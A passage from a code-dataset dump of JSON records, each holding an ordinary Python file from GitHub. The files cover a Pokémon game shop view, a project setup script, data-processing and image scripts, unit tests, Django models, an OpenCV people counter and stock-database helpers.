response1[\"action\"] == \"Revenir plus tard\":\n ras = True\n else:\n if response1[\"action\"] == \"Acheter une pokéball\":\n type = \"pokeball\"\n elif response1[\"action\"] == \"Acheter une superball\":\n type = \"superball\"\n elif response1[\"action\"] == \"Acheter une hyperball\":\n type = \"hyperball\"\n response2 = prompt(self.question2)\n quantite=response2[\"quantite\"]\n achat.acheter(type, quantite, self._session.joueur_actif)\n return next_view\n","repo_name":"ChatBear/Pokemon-Ensai-projet-","sub_path":"Controleur/achatView.py","file_name":"achatView.py","file_ext":"py","file_size_in_byte":2186,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"71183036673","text":"import subprocess\nimport sys\nimport os\n\ntry:\n import pip\nexcept ImportError:\n sys.stderr.write('Please install pip and then re-run this script.\\nFor installation instructions visit: ' +\n 'https://pip.pypa.io/en/stable/installing/\\n')\n sys.exit(7)\n\n\ndef check_project_structure(modules, packages, dirs):\n root = os.path.dirname(os.path.abspath(__file__))\n\n for dir in dirs:\n path = os.path.join(root, dir)\n if not os.path.exists(path) or not os.path.isdir(path):\n sys.stderr.write('directory: {} is missing / invalid!\\n'.format(dir))\n sys.exit(2)\n\n for package in packages:\n path = os.path.join(root, package)\n if not os.path.exists(path) or not os.path.isdir(path) or not os.path.exists(os.path.join(path, '__init__.py')):\n sys.stderr.write('package: {} is missing / invalid!\\n'.format(dir))\n sys.exit(3)\n\n for module in modules:\n path = os.path.join(root, module)\n if not os.path.exists(path) or not os.path.isfile(path):\n sys.stderr.write('module: {} is missing / invalid!\\n'.format(module))\n sys.exit(4)\n\n sys.stdout.write('project...OK\\n')\n\n\ndef parse_dependencies():\n path = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'dependencies.txt')\n if not os.path.exists(path):\n sys.stderr.write('Missing dependencies.txt!')\n sys.exit(1)\n\n dependencies = []\n with open(path, 'r') as f:\n line = f.readline()\n while line:\n hashtag_index = -1\n for i in range(0, len(line)):\n if line[i] == '#':\n hashtag_index = i\n break\n\n if hashtag_index >= 0:\n line = line[:hashtag_index]\n\n if len(line) > 0:\n if line[0] != '#':\n line = line.strip()\n dependencies.append(line)\n\n line = f.readline()\n\n return dependencies\n\n\ndef exec_pip(dependency):\n command = ['python', '-m', 'pip', 'install', dependency]\n\n try:\n subprocess.check_call(command, stderr=subprocess.DEVNULL, stdout=subprocess.DEVNULL)\n sys.stdout.write(dependency + '...OK\\n')\n except subprocess.CalledProcessError as e:\n sys.stderr.write(str(e) + '\\n' + dependency + '...BAD\\n')\n\n\ndef check_version(min_version, max_version=None):\n sys_version = sys.version_info\n\n if max_version is None:\n if sys_version >= min_version:\n sys.stdout.write('Python version: {}...OK\\n'.format(sys.version))\n else:\n sys.stderr.write('Python version: {}...BAD\\nThis version does not meet the minimum version of: {}\\n'.format(\n sys.version, min_version))\n sys.exit(5)\n elif min_version > max_version:\n sys.stderr.write('Setup configuration error!\\nminimum version cannot exceed maximum version!\\n')\n sys.exit(6)\n else:\n if sys_version < min_version:\n sys.stderr.write('Python version: {}...BAD\\nThis version does not meet the minimum version of: {}\\n'.format(\n sys.version, min_version))\n sys.exit(5)\n elif sys_version > max_version:\n sys.stderr.write('Python version: {}...BAD\\nThis version exceeds the maximum version of: {}\\n'.format(\n sys.version, max_version))\n sys.exit(7)\n else:\n sys.stdout.write('Python version: {}...OK\\n'.format(sys.version))\n\n\ntitle = 'Python 3 Project template'\ndescription = 'A project template for python 3'\nauthor = 'Dylan David Randall'\nauthor_email = 'dylan.d.randall@gmail.com'\nversion = '0.0.0'\ndownload_url = ''\nmin_version = (3, 0, 0)\nmax_version = (3, 9, 9)\n\ndirs = ['logs']\npackages = ['injection', 'logger']\nmodules = ['definitions.py', 'dependencies.txt']\n\n\nlogo = '#----------------------------------------------------------------#\\n'\nlogo += '| ____ _ _ _____ _ |\\n'\nlogo += '| / __ \\ (_) | | / ____| | | |\\n'\nlogo += '| | | | |_ _ _ ___| | __ | (___ ___| |_ _ _ _ __ |\\n'\nlogo += '| | | | | | | | |/ __| |/ / \\___ \\ / _ \\ __| | | | \\'_ \\ |\\n'\nlogo += '| | |__| | |_| | | (__| < ____) | __/ |_| |_| | |_) | |\\n'\nlogo += '| \\___\\_\\\\\\__,_|_|\\___|_|\\_\\ |_____/ \\___|\\__|\\__,_| .__/ |\\n'\nlogo += '| | | |\\n'\nlogo += '| |_| |\\n'\nlogo += '| |\\n'\nlogo += '#----------------------------------------------------------------#\\n'\nlogo += '| By Dylan Randall |\\n'\nlogo += '#----------------------------------------------------------------#'\n\nprint(logo)\nsave_details = input(\"\\nsave details to INFO.txt ? [y/n]: \")\nsave_details = save_details.lower()\n\nsys.stdout.write('\\nchecking python version...\\n')\ncheck_version(min_version, max_version)\n\nsys.stdout.write('\\nchecking project structure...\\n')\ncheck_project_structure(modules, packages, dirs)\n\ndependencies = parse_dependencies()\nif len(dependencies) > 0:\n sys.stdout.write('\\nsetting up dependencies... (this may take some time)\\n')\n for dependency in dependencies:\n exec_pip(dependency)\n\ndetails = 'Details\\n-------\\nTitle: ' + title + '\\nVersion: ' + version + '\\n' + 'Description: ' + description + '\\n'\\\n + 'Author: ' + author + '\\n' + 'Author\\'s Email: ' + author + '\\n'\n\nif download_url:\n details += 'Download URL: ' + download_url + '\\n'\n\nif len(dependencies) > 0:\n details += '\\nDependencies:\\n'\n for dependency in dependencies:\n details += dependency + '\\n'\n\nsys.stdout.write('\\nquick setup finished\\n\\n' + details)\n\nif len(save_details) > 0:\n if save_details[0] == 'y':\n with open('INFO.txt', 'w+') as f:\n f.write(details)\n\nsys.stdout.write(\"\\nfinished\\n\")\n","repo_name":"HOWZ1T/-python-3-_project_template","sub_path":"quick_setup.py","file_name":"quick_setup.py","file_ext":"py","file_size_in_byte":5996,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"4026592713","text":"import sys\n\ndef count_movies_by_genre(input_file, output_file):\n genre_count = {}\n\n with open(input_file, 'r', encoding='latin-1') as file:\n for line in file:\n _, _, genres = line.strip().split('::')\n movie_genres = genres.split('|')\n\n for genre in movie_genres:\n if genre in genre_count:\n genre_count[genre] += 1\n else:\n genre_count[genre] = 1\n\n with open(output_file, 'w') as output:\n for genre, count in genre_count.items():\n output.write(f\"{genre} {count}\\n\")\n\nif __name__ == \"__main__\":\n if len(sys.argv) != 3:\n print(\"Usage: python3 IMDBStudent<20210801>.py \")\n sys.exit(1)\n\n input_file = sys.argv[1]\n output_file = sys.argv[2]\n\n count_movies_by_genre(input_file, output_file)\n print(output_file)\n","repo_name":"DoGyeongL/BigdataProcess","sub_path":"student<20210801>.py","file_name":"student<20210801>.py","file_ext":"py","file_size_in_byte":893,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"25019828716","text":"# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution:\n def deleteNode(self, node):\n \"\"\"\n :type node: ListNode\n :rtype: void Do not return anything, modify node in-place instead.\n \"\"\"\n #we make a check if the list has less than 2 nodes.\n if node == None or node.next == None:\n return\n \n \"\"\"\n we set the current node's next's value.\n Then we make the current node point\n to the node's next's next node.\n \"\"\"\n node.val = node.next.val\n node.next = node.next.next\n \n return","repo_name":"uclaacm/cs32-interview-prep20","sub_path":"Workshop2_Linked Lists/Warmup_.py","file_name":"Warmup_.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"61"} +{"seq_id":"71732788355","text":"import cv2\r\nimport os\r\nimport numpy as np\r\nroute = '../output/testov'\r\nfiles = os.listdir(route)\r\nfor fil in files:\r\n if fil != 'output':\r\n path = os.path.join(route,fil)\r\n l = os.listdir(path)\r\n img_stack = []\r\n for fi in l:\r\n # print(fi)\r\n img_stack.append(cv2.imread(os.path.join(path,fi)))\r\n cv2.imshow('im1',img_stack[0])\r\n cv2.imshow('im2',img_stack[1])\r\n im1 = img_stack[0].astype(float)\r\n im2 = img_stack[1].astype(float)\r\n # plus and divide by 2\r\n im3 = ((img_stack[0].astype(float) + img_stack[1].astype(float))/2)\r\n im3 = cv2.normalize(im3, None, 0, 255, cv2.NORM_MINMAX, cv2.CV_8U)\r\n\r\n # max\r\n im4 = np.maximum(im1,im2)\r\n im4 = cv2.normalize(im4, None, 0, 255, cv2.NORM_MINMAX, cv2.CV_8U)\r\n \r\n save = '../output/testov/output'\r\n cv2.imwrite(os.path.join(save,fil + '-im3.png'),im3)\r\n cv2.imwrite(os.path.join(save,fil + '-im4.png'),im4)","repo_name":"thanaphon0737/pytorch-vita-apply-text-replacement","sub_path":"merge2pic.py","file_name":"merge2pic.py","file_ext":"py","file_size_in_byte":1011,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72059917635","text":"import pytest\ndef fibonnaci(n):\n if n < 2:\n return n # base da recursao, o inicio\n else:\n return fibonnaci(n-1) + fibonnaci(n-2) # Chamada recursiva\n\n@pytest.mark.parametrize(\"entrada, esperado\", [\n (0, 0),\n (1, 1),\n (2, 1),\n (3, 2),\n (4, 3),\n (5, 5),\n (6, 8),\n (7, 13)\n ])\n\ndef testa_fibonacci(entrada, esperado):\n assert fibonnaci(entrada) == esperado\n\n","repo_name":"felipefazani/Aprendendo","sub_path":"PYTHON/02POO/06Recursao/Fibonnaci.py","file_name":"Fibonnaci.py","file_ext":"py","file_size_in_byte":425,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"16226121879","text":"'''\nCreated on Mar 6, 2014\n\n@author: xapharius\n'''\nimport unittest\nimport utils.numpyutils as nputils\nimport numpy as np\nimport sys\nfrom _ast import Assert\n\nclass numpyutilsTest(unittest.TestCase):\n\n \n def testaddOneToVec(self):\n '''\n Test valid execution of one-dim, row and column vector\n '''\n #vector array\n vec = np.array([1,2,3])\n vecOne = nputils.add_one_to_vec(vec)\n assert vecOne.shape[0] == 1 and vecOne.shape[1] == vec.shape[0]+1, \"anddOneToVec fails for normal vec (x,)\"\n \n #row vector array\n vec = np.array([[1,2,3]])\n vecOne = nputils.add_one_to_vec(vec)\n assert vecOne.shape[0] == 1 and vecOne.shape[1] == vec.shape[1]+1, \"anddOneToVec fails for row vec (1,x)\"\n \n #row vector array\n vec = np.array([[1],[2],[3]])\n vecOne = nputils.add_one_to_vec(vec)\n assert vecOne.shape[1] == 1 and vecOne.shape[0] == vec.shape[0]+1, \"anddOneToVec fails for row vec (1,x)\"\n \n def testaddOneToVec_neg(self):\n '''\n Test exception in case of matrix as parameter\n '''\n \n mat = np.array([[1,2,3],[4,5,6]])\n try:\n nputils.add_one_to_vec(mat)\n assert(False)\n except:\n expected_errmsg = \"addOne works only for one dimensional vectors\"\n errmsg = str(sys.exc_info()[1])\n assert(errmsg.startswith(expected_errmsg))\n \nif __name__ == \"__main__\":\n #import sys;sys.argv = ['', 'Test.testName']\n unittest.main()","repo_name":"xapharius/mrEnsemble","sub_path":"Engine/src/tests/utils/numpyutilsTest.py","file_name":"numpyutilsTest.py","file_ext":"py","file_size_in_byte":1550,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"41518631743","text":"\nimport unittest\nfrom os import listdir\nfrom os.path import isfile, join\n\nfrom SunScreenServer.GetSecrets import get_secrets\nfrom SunScreenServer.OpenPosCalc import get_open_percentage_required, open_percentage_required, round_to_nearest\nfrom SunScreenServer.SunPositionCalcs import DEG_TO_RAD\n\n\nclass OpenPosCalcTest(unittest.TestCase):\n\n secrets = get_secrets()\n\n def test_open_pos(self):\n self.assertEqual(int(24.46524406), open_percentage_required(49.83*DEG_TO_RAD, -1.158375025))\n\n def test_open_pos_with_adjustment(self):\n self.assertEqual(int(24.46524406) + 10, open_percentage_required(49.83*DEG_TO_RAD, -1.158375025, adjustment=10))\n\n\n def test_round_to_nearest(self):\n self.assertEqual(0, round_to_nearest(0, 50))\n self.assertNotEqual(0, round_to_nearest(1, 50))\n self.assertEqual(50, round_to_nearest(1, 50))\n self.assertEqual(50, round_to_nearest(50, 50))\n self.assertEqual(100, round_to_nearest(51, 50))\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"jcjveraa/sunscreen-controller","sub_path":"server_script/tests/OpenPositionCalc_test.py","file_name":"OpenPositionCalc_test.py","file_ext":"py","file_size_in_byte":1026,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"10316191880","text":"from django.contrib.auth import get_user_model\nfrom django.core.validators import MaxValueValidator, MinValueValidator\nfrom django.db import models\n\nfrom .validators import validate_year\n\nUser = get_user_model()\n\n\nclass CategoryGenreBase(models.Model):\n name = models.CharField(verbose_name=\"Название\", max_length=256)\n slug = models.SlugField(\n verbose_name=\"Уникальный слаг\", max_length=50, unique=True\n )\n\n class Meta:\n abstract = True\n ordering = (\"name\",)\n\n def __str__(self):\n return self.name\n\n\nclass Category(CategoryGenreBase):\n class Meta(CategoryGenreBase.Meta):\n verbose_name = \"Категория\"\n verbose_name_plural = \"Категории\"\n\n\nclass Genre(CategoryGenreBase):\n class Meta(CategoryGenreBase.Meta):\n verbose_name = \"Жанр\"\n verbose_name_plural = \"Жанры\"\n\n\nclass Title(models.Model):\n name = models.CharField(verbose_name=\"Название\", max_length=256)\n year = models.PositiveSmallIntegerField(\n verbose_name=\"Дата выхода\", db_index=True, validators=[validate_year]\n )\n description = models.TextField(\n verbose_name=\"Описание\", null=True, blank=True\n )\n genre = models.ManyToManyField(\n Genre,\n verbose_name=\"Жанр\",\n related_name=\"titles\",\n )\n category = models.ForeignKey(\n Category,\n verbose_name=\"Категория\",\n on_delete=models.SET_NULL,\n related_name=\"titles\",\n null=True,\n )\n\n class Meta:\n ordering = (\"name\",)\n verbose_name = \"Произведение\"\n verbose_name_plural = \"Произведения\"\n\n def __str__(self):\n return self.name\n\n\nclass Review(models.Model):\n title = models.ForeignKey(\n Title, on_delete=models.CASCADE, related_name=\"reviews\"\n )\n text = models.TextField(verbose_name=\"text field\")\n author = models.ForeignKey(\n User, on_delete=models.CASCADE, related_name=\"comments\"\n )\n score = models.PositiveSmallIntegerField(\n verbose_name=\"Score\",\n null=True,\n validators=[MinValueValidator(1), MaxValueValidator(10)],\n )\n pub_date = models.DateTimeField(\"Pub-date\", auto_now_add=True)\n\n class Meta:\n constraints = [\n models.UniqueConstraint(\n fields=[\"author\", \"title\"], name=\"unique_author_review\"\n )\n ]\n verbose_name = \"Отзыв\"\n verbose_name_plural = \"Отзывы\"\n\n\nclass Comment(models.Model):\n review = models.ForeignKey(\n Review, on_delete=models.CASCADE, related_name=\"comments\"\n )\n text = models.TextField(verbose_name=\"text_field\")\n author = models.ForeignKey(\n User, on_delete=models.CASCADE, related_name=\"reviews\"\n )\n pub_date = models.DateTimeField(\"Pub-date_\", auto_now_add=True)\n\n class Meta:\n verbose_name = \"Комментарий\"\n verbose_name_plural = \"Комментарии\"\n","repo_name":"tarki2206/group_project","sub_path":"api_yamdb/reviews/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3003,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23426509561","text":"T = int(input())\n\nfor i in range(1, T+1):\n time = 0\n crate = 2.0\n cost, frate, goal = list(map(float, input().split())) # factory cost, factory cookie rate, goal\n\n while(1):\n tfinal = goal / crate\n tneeded = cost / crate\n trec = tneeded + (goal / (crate+frate))\n\n if (trec < tfinal):\n time += tneeded\n crate += frate\n else:\n time += tfinal\n break\n\n print ('Case #%s: %.7f' % (i, time))\n\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_136/2980.py","file_name":"2980.py","file_ext":"py","file_size_in_byte":481,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"21954275256","text":"PLOT = False\n\nimport nose\nif PLOT:\n import matplotlib\n import matplotlib.pyplot as plt\nimport numpy as np\n\nfrom motion_plan import plan\n\nRESOLUTION = 0.001\nEPSILON = 0.005\n\nif PLOT: _, ax = plt.subplots()\n\ndef setup():\n pass\n\ndef teardown_plot():\n if PLOT:\n ax.set(xlabel=\"t (s)\", ylabel=\"s\", title=\"Planned Motion\")\n ax.grid()\n plt.show()\n\n@nose.with_setup(setup, teardown_plot)\ndef test_plan():\n parameter_sets_to_test = [\n #s_start, s_end, v_start, v_max, a_max\n [0.0, 0.0, 0.0, 1, 1],\n [0.0, 0.0, 1.0, 1, 1],\n [0.0, 2.0, 0.0, 1, 1],\n [0.0, 2.0, 0.0, 2, 4],\n [1.0, 2.0, 0.1, 2, 4],\n [1.0, -2.0, 1.0, 2, 4],\n [1.0, -2.0, -1.0, 2, 4],\n [-2.0, 2.0, 0.0, 1, 1],\n [-2.0, -0.5, 0.0, 1, 1],\n [0.0, 1.0, 0.5, 1, 1],\n [0.0, 1.0, 0.0, 1, 2],\n [0.0, 0.5, 0.0, 1, 2],\n [0.0, 0.5, 1.0, 1, 1], # Break only.\n [0.0, -0.1, -1, 1, 1],\n [0.0, 0.1, 1, 1, 1],\n [0.0, 0.2, 1, 1, 1], # Overshoots.\n [0.0, -1.0, 0, 1, 1], # Falling motion.\n [1.0, 0.2, 1, 1, 1],\n ]\n\n for parameter_set in parameter_sets_to_test:\n print()\n print(\"s_start = {}, s_end = {}, v_start = {}, v_max = {}, a_max = {}\".format(*parameter_set))\n s, duration = plan(*parameter_set)\n print(\"duration = {}\".format(duration))\n ts = np.arange(0, duration + RESOLUTION, RESOLUTION)\n s_ts = np.array([s(t) for t in ts])\n\n s_start, s_end, v_start, v_max, a_max = parameter_set\n # Check planned motion.\n assert abs(s(0) - s_start) < EPSILON\n assert abs(s(duration) - s_end) < EPSILON\n # Check that velocity is continuous (no jumps).\n v_before = v_start\n for i in range(int((duration + RESOLUTION) // RESOLUTION)):\n if i == 0: continue\n # Check derivations using difference quotient approximation.\n v_current = (s_ts[i] - s_ts[i - 1]) / RESOLUTION\n assert abs(v_current) <= v_max + EPSILON\n if i == 1: assert abs(v_current - v_start) < EPSILON\n a_current = (v_current - v_before) / RESOLUTION\n assert abs(a_current) <= a_max + EPSILON\n v_before = v_current\n\n if PLOT: ax.plot(ts, s_ts)\n\nnose.main()\n","repo_name":"oberger4711/nerf2face","sub_path":"src/control/scripts/motion_plan/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2634,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"71812617474","text":"import os\n\nclass Config:\n def __init__(self):\n self.frontendUrls = [\"http://localhost:4200\", \"https://portfolio.codieorberson.com\"]\n self.storageName = \"codieportfolio\"\n self.containerName = \"chatgpt\"\n\n self.storageKey = os.environ.get(\"STORAGE_KEY\")\n self.chatGptApiKey = os.environ.get(\"CHATGPT_API_KEY\")\n self.orgId = os.environ.get(\"ORG_ID\")\n self.storageConnectionString = os.environ.get(\"STORAGE_CONNECTION_STRING\")","repo_name":"codieorberson/ChatGpt-Showcase","sub_path":"Configs/Config.py","file_name":"Config.py","file_ext":"py","file_size_in_byte":488,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"40648126155","text":"# Code to count people in and out of a room/area\nimport cv2 # OpenCV library\nimport numpy as np # Numpy library\n\nvideo = cv2.VideoCapture(\"People-Counter\\escalator.mp4\") # Video capture object\n\ncounter = 0 # Counter to count people in and out of the room/area\nreleased = False # Boolean to check if the person has been counted or not\n\nwhile True:\n ret, img = video.read() # Read video frame by frame\n # cv2.imshow(\"Video\", img)\n # cv2.waitKey(0) # Show video frame by frame\n # break\n # print(img.size) # Print image shape\n img = cv2.resize(\n img,\n (1100, 720),\n ) # Resize frame\n # img = cv2.resize(img,) # Resize video frame\n imgGray = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY) # Convert video frame to grayscale\n x, y, w, h = 490, 230, 30, 150 # Set ROI coordinates\n imgTh = cv2.adaptiveThreshold(\n imgGray, 255, cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY_INV, 11, 12\n ) # Apply adaptive threshold to grayscale image to get binary image\n kernel = np.ones((8, 8), np.uint8) # Kernel for dilation\n imgDil = cv2.dilate(imgTh, kernel, iterations=2) # Dilate binary image\n\n clip = imgDil[y : y + h, x : x + w] # Clip the box from the image ##recorte\n white = cv2.countNonZero(\n clip\n ) # Count the number of white pixels in the box ##brancos\n\n if (\n white > 4000 and released == True\n ): # If white pixels are more than 4000 and the person is not released\n counter += 1 # Increment counter\n if white < 4000: # If white pixels are less than 4000\n released = True # Set released to True\n else:\n released = False\n\n if released == False: # If person is not released\n cv2.rectangle(\n img, (x, y), (x + w, y + h), (0, 255, 0), 4\n ) # Draw green rectangle\n else:\n cv2.rectangle(\n img, (x, y), (x + w, y + h), (255, 0, 255), 4\n ) # Draw magenta rectangle\n\n # cv2.putText(img, str(white), (x - 30, y - 50), cv2.FONT_HERSHEY_SIMPLEX, 1, (255, 255, 255), 1,) #print number of white pixels\n # cv2.rectangle(img, (575, 155), (575 + 88, 155 + 85), (255, 255, 255), -1) # Draw a rectangle to cover the counter\n cv2.putText(\n img,\n str(counter),\n (x + 100, y + 100),\n cv2.FONT_HERSHEY_SIMPLEX,\n 3,\n (255, 0, 0),\n 5,\n ) # Display the number of people in the box\n\n cv2.imshow(\"Video\", img)\n cv2.waitKey(20) # Show video frame by frame\n","repo_name":"MayeshMohapatra/CV-tasks","sub_path":"People-Counter/PeopleCounter.py","file_name":"PeopleCounter.py","file_ext":"py","file_size_in_byte":2485,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"28499502429","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\n# 03/07/2018\n\nimport os, sys\nfrom sortscaffolds import Gene, Scaffold, Data, getTabelas\n\n__author__ = \"Miquéias Fernandes\"\n__copyright__ = \"Copyright 2018 mikeias.net\"\n__license__ = \"MIT\"\n__version__ = \"1.1\"\n\n\ndef process(fasta, gff):\n\n print('importando as informações ...')\n ret = getTabelas(fasta, gff)\n genes = ret[1]\n\n fo = open(fasta + '.genes.fa', \"w\")\n\n for gene in genes:\n fo.write(\">\" + gene.nome + '\\n')\n fo.write(gene.getSeq() + '\\n')\n fo.close()\n\n\nif __name__ == \"__main__\":\n sys.argv.extend(['/home/mfernandes/Documentos/relatorio_mestrado/julho/homology_ecalyptus/egrand.3.fa',\n '/home/mfernandes/Documentos/relatorio_mestrado/julho/homology_ecalyptus/egrand.gff'])\n\n if len(sys.argv) < 3:\n print(\"use: ./extract_fasta_from_gff.py scaffolds.fasta genes.gff\")\n else:\n process(sys.argv[1], sys.argv[2])\n","repo_name":"MiqueiasFernandes/bioinformatics","sub_path":"extract_fasta_from_gff.py","file_name":"extract_fasta_from_gff.py","file_ext":"py","file_size_in_byte":943,"program_lang":"python","lang":"pt","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"3240808743","text":"import pandas as pd\nimport matplotlib.pyplot as plt\n\nimport sys\n\nprint ('Number of arguments:', len(sys.argv), 'arguments.')\nprint ('Argument List:', str(sys.argv))\ndt = float(sys.argv[1])\nxlabel = str(sys.argv[2])\nlegend = str(sys.argv[3])\nmultiplot = bool(sys.argv[4])\n\ndf = pd.read_csv('tmp.txt', header=None)\ndf.index += 1\ndf.index *= dt\n\nif multiplot:\n\tdf2 = pd.read_csv('tmp2.txt', header=None)\n\tdf2.index += 1\n\tdf2.index *= dt\n\n\tdf3 = pd.concat([df, df2], axis=1)\n\tdf3.columns = [\"newton\", \"stressvel\"]\n\tdf3.index.name=\"day\"\n\tdf3.to_csv(\"2km.csv\", na_rep=' ')\n\tax = df3.plot(style='-o', logy=True, markersize=4)\n\tax.set_xlabel(xlabel)\n\tax.legend([\"stdnewton\", \"stressvel\"])\n\t#ax.set_title(\"mesh size 4km; delta_min = 2e-10\", fontsize=12)\n\tax.set_ylim([2,500]);\nelse:\n\tdf3 = pd.concat([df, df2], axis=1)\n\tax = df3.plot(style='-o', logy=True, markersize=4)\n\tax.set_xlabel(xlabel)\n\tax.legend(legend)\n\nplt.savefig('conv.png')\nplt.show()\n\n","repo_name":"MelodyShih/SeaIce_svNewton","sub_path":"plotdata.py","file_name":"plotdata.py","file_ext":"py","file_size_in_byte":941,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"37638981932","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Mar 10 21:11:51 2016\n\n@author: who8736\n\"\"\"\n\nimport os\nimport logging\n# import urllib2\n# import socket\nimport datetime as dt\nfrom datetime import datetime\n# import ConfigParser\n# import re\n# import time\n\n# import sys\n\n\n# from lxml import etree\n# import lxml\n# import tushare as ts # @UnresolvedImport\nimport pandas as pd\n# from pandas.compat import StringIO\nfrom io import StringIO\n# from sqlalchemy import create_engine\nfrom sqlalchemy import MetaData, Table, Column\nfrom sqlalchemy import DATE, DECIMAL, String\nfrom sqlalchemy.ext.declarative import declarative_base\n# from sqlalchemy.orm import sessionmaker, scoped_session\n# import sqlalchemy\nfrom pandas.core.frame import DataFrame\n# from tushare.stock import cons as ct\nimport xlrd\nimport tushare as ts\n\nimport datatrans\nimport initsql\nfrom sqlconn import SQLConn\n# from misc import filenameGuben, filenameLirun, filenameGuzhi\nfrom misc import filenameLirun, filenameGuzhi\nfrom initlog import initlog\n\n# from download import downHYFile\n\n# from bokeh.sampledata import stocks\n\n\nsqlconn = SQLConn()\nengine = sqlconn.engine\nSession = sqlconn.Session\n\n\ndef writeHYToSQL(filename):\n \"\"\" 从文件中读取行业与股票对应关系并写入数据库\n \"\"\"\n filename = os.path.join('./data', filename)\n xlsFile = xlrd.open_workbook(filename, encoding_override=\"cp1252\")\n table = xlsFile.sheets()[4]\n ts_codeList = table.col_values(0)[1:]\n ts_codeList = [i + ('.SH' if i[0] == '6' else '.SZ') for i in ts_codeList]\n hyIDList = table.col_values(8)[1:]\n hyDf = pd.DataFrame({'ts_code': ts_codeList, 'classify_code': hyIDList})\n engine.execute('TRUNCATE TABLE classify_member')\n writeSQL(hyDf, 'classify_member')\n\n\ndef writeHYNameToSQL(filename):\n filename = os.path.join('./data', filename)\n xlsFile = xlrd.open_workbook(filename, encoding_override=\"cp1252\")\n table = xlsFile.sheets()[0]\n hyIDList = table.col_values(0)[1:]\n hyNameList = table.col_values(1)[1:]\n hyLevelList = [len(hyID) / 2 for hyID in hyIDList]\n hyLevel1IDList = [hyID[:2] for hyID in hyIDList]\n hyLevel2IDList = [hyID[:4] for hyID in hyIDList]\n hyLevel3IDList = [hyID[:6] for hyID in hyIDList]\n hyNameDf = pd.DataFrame({'code': hyIDList,\n 'name': hyNameList,\n 'level': hyLevelList,\n 'level1id': hyLevel1IDList,\n 'level2id': hyLevel2IDList,\n 'level3id': hyLevel3IDList})\n engine.execute('TRUNCATE TABLE classify')\n writeSQL(hyNameDf, 'classify')\n\n\ndef writeGubenToSQL(gubenDf, replace=False):\n \"\"\"单个股票股本数据写入数据库\n :param replace:\n :type gubenDf: DataFrame\n \"\"\"\n tablename = 'guben'\n # lastUpdate = gubenUpdateDate(ts_code)\n # gubenDf = gubenDf[pd.Timestamp(gubenDf.date) > lastUpdate]\n # gubenDf = gubenDf[gubenDf.date > lastUpdate]\n if gubenDf.empty:\n return None\n if replace:\n for index, row in gubenDf.iterrows():\n sql = (('replace into guben'\n '(ts_code, date, totalshares) '\n 'values(\"%s\", \"%s\", %s)')\n % (row['ts_code'], row['date'], row['totalshares']))\n engine.execute(sql)\n else:\n return writeSQL(gubenDf, tablename)\n\n\ndef writeGuzhiToSQL(ts_code, data):\n \"\"\"下载单个股票估值数据写入数据库\"\"\"\n guzhiDict = datatrans.transGuzhiDataToDict(data)\n if guzhiDict is None:\n return True\n # print guzhiDict\n # guzhiDf = DataFrame(guzhiDict, index=[0])\n # writeSQLUpdate(guzhiDict, 'guzhi')\n # print guzhiDict\n tablename = 'guzhi'\n if 'peg' in list(guzhiDict.keys()):\n peg = guzhiDict['peg']\n else:\n peg = 'null'\n if 'next1YearPE' in list(guzhiDict.keys()):\n next1YearPE = guzhiDict['next1YearPE']\n else:\n next1YearPE = 'null'\n if 'next2YearPE' in list(guzhiDict.keys()):\n next2YearPE = guzhiDict['next2YearPE']\n else:\n next2YearPE = 'null'\n if 'next3YearPE' in list(guzhiDict.keys()):\n next3YearPE = guzhiDict['next3YearPE']\n else:\n next3YearPE = 'null'\n sql = (('replace into %(tablename)s'\n '(ts_code, peg, next1YearPE, next2YearPE, next3YearPE) '\n 'values(\"%(ts_code)s\", %(peg)s, '\n '%(next1YearPE)s, %(next2YearPE)s, '\n '%(next3YearPE)s);') % locals())\n return engine.execute(sql)\n\n\n# def writeKline(ts_code, df, insertType='IGNORE'):\n# \"\"\"股票K线历史写入数据库\"\"\"\n# tableName = tablenameKline(ts_code)\n# if not initsql.existTable(tableName):\n# initsql.createKlineTable(ts_code)\n# return writeSQL(df, tableName, insertType)\n\n\ndef lirunFileToList(ts_code, date):\n fileName = filenameLirun(ts_code)\n lirunFile = open(fileName, 'r')\n lirunData = lirunFile.readlines()\n\n dateList = lirunData[0].split()\n logging.debug(repr(dateList))\n\n try:\n index = dateList.index(date)\n logging.debug(repr(index))\n except ValueError:\n return []\n\n profitsList = lirunData[42].split()\n # if profitsList[0].decode('gbk') != '归属于母公司所有者的净利润':\n if profitsList[0] != 